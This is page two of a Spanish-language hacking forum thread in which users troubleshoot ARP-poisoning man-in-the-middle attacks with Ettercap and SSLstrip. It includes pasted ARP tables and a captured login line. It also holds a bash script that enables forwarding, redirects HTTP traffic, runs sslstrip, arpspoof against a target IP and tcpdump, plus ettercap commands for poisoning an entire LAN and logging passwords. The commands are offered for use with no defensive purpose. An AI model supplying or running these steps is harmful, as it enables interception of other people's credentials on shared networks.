elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ettercap+Sslstrip
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Ettercap+Sslstrip  (Leído 20,868 veces)
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #10 en: 10 Marzo 2010, 23:29 pm »

Si lo he leido para asegurarme , nose porque no cambia las direcciones MAC hm no tengo ni idea de como solucionarlo.Pongo de paso un enlace donde se explica perfectamente, pero aun asi ami no me funciona el ataque ARP.
http://casidiablo.net/videotutoriales/ettercap.htm?keepThis=true&TB_iframe=true&height=635&width=800
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #11 en: 10 Marzo 2010, 23:34 pm »

pues si es raro si.. no creo que tengas la tabla estática... para asegurarte prueba a cambiarla tu a mano
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #12 en: 10 Marzo 2010, 23:39 pm »

Podria ser cosa del router ? el Firewall lo he desactivado para hacer pruebas pero nuse voy a mirar lo de la tabla.
Bueno te pego las entradas de mi tabla ARP:

? (192.168.2.10) at 00:1d:e0:8f:XX:XX [ether] PERM on wlan0 ----> (esta estaba añadida que como se ve es la del pc que quiero escanear)
? (192.168.2.1) at 00:22:75:7b:XX:XX [ether] on wlan0 --------->(Esta la he añadadido yo y es la del router)
« Última modificación: 11 Marzo 2010, 00:19 am por Goshin » En línea

Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #13 en: 11 Marzo 2010, 01:21 am »

hmm me ha pasado una cosa interesante , he consegido capturar un packete que si me sale en el user messages y es del foro.
HTTP : 66.118.xx.xx:xx -> USER: goshin  PASS:   INFO: http://foro.elhacker.net/login.html

El pass no sale ni en el ettercap, al ver esto me he animado y he empezado a logearme en varios sitios , pero sin ningun resultado la verdad esque me estoy desesperando xDDD
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #14 en: 11 Marzo 2010, 20:22 pm »

o te sale o no te sale, no puede ser que te salgan unas cosas y otras no... :-\

es lógico que bastantes cosas no te salgan ya que serán datos de páginas cifradas, de ahí que te dijese que primero hay que cerciorarse que se hace bien el MiM y luego ya le das caña al SslStrip
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
oleviatan

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #15 en: 6 Abril 2010, 00:53 am »

Ola amigos!!

He estado leyendo este hilo y a mi me ocurre lo mismo que a Goshin. Estoy en la misma situación hago un arp poisoning con un filtro ssh y me sale de vez en cuando en la tabla de mensajes:
Código:
DHCP: [192.168.1.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.1.1 DNS 80.58.61.250
DHCP: [192.168.1.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.1.1 DNS 80.58.61.250
Y en las conexiones a veces veo algo leible, pero no paso de ahí.

Si se ha solucionado podrías decirme como

Muchas gracias.
En línea

l1vv3r

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #16 en: 15 Abril 2010, 16:35 pm »

Te dejo un script que a mi me funciona a la perfeccion en cuanto a funcionamiento de sslstrip:

#!/bin/bash

path_dir=/tmp #La ruta donde quieras guardar los resultados
file_name=sslstrip.log
file_name2=tcpdump.pcap
device=wlan0 #Modifica según el dispositivo desde donde hagas la captura.
$direccion_ip=192.168.0.12 #La IP del objetivo
$gateway=192.168.0.1 #La IP para realizar el ARP Spoofing

   echo "1" > /proc/sys/net/ipv4/ip_forward
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5555
   roxterm --tab -e sslstrip -w $path_dir/$file_name -l 5555
   roxterm --tab -e arpspoof -i $device -t $direccion_ip $gateway
   roxterm --tab -e tcpdump -nni $device -s 0 -w $path_dir/$file_name2 host $direccion_ip

Espero que te sea de utilidad
En línea

PyrOS-9889

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #17 en: 25 Septiembre 2010, 21:45 pm »

mejor prueba esto

pero si lo quieres hacer con ettercap puedes probar esto:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
ettercap -TqM arp // // -i eth0
sslstrip -w passwords
tail -f passwords

con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD

algo tarde pero pues a lo mejor a alguien le sirve... :p
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
HOW TO: Sniffing en Linux (Ettercap+SSLstrip+Driftnet) « 1 2 3 »
Hacking
mrfloffy 28 47,411 Último mensaje 31 Julio 2011, 16:44 pm
por necoreitor
Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf
Hacking
r00ty 0 6,613 Último mensaje 1 Diciembre 2010, 06:31 am
por r00ty
ayuda ettercap+sslstrip
Hacking
wampis 3 5,709 Último mensaje 22 Septiembre 2011, 10:17 am
por ChimoC
sslstrip en wifiway 2.0.2
Wireless en Linux
valdomero 1 3,566 Último mensaje 23 Marzo 2011, 23:07 pm
por valdomero
Mitm con ettercap + sslstrip en VM Backtrack sobre Mac OS X
Hacking
astcorp 0 2,281 Último mensaje 13 Febrero 2014, 00:24 am
por astcorp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines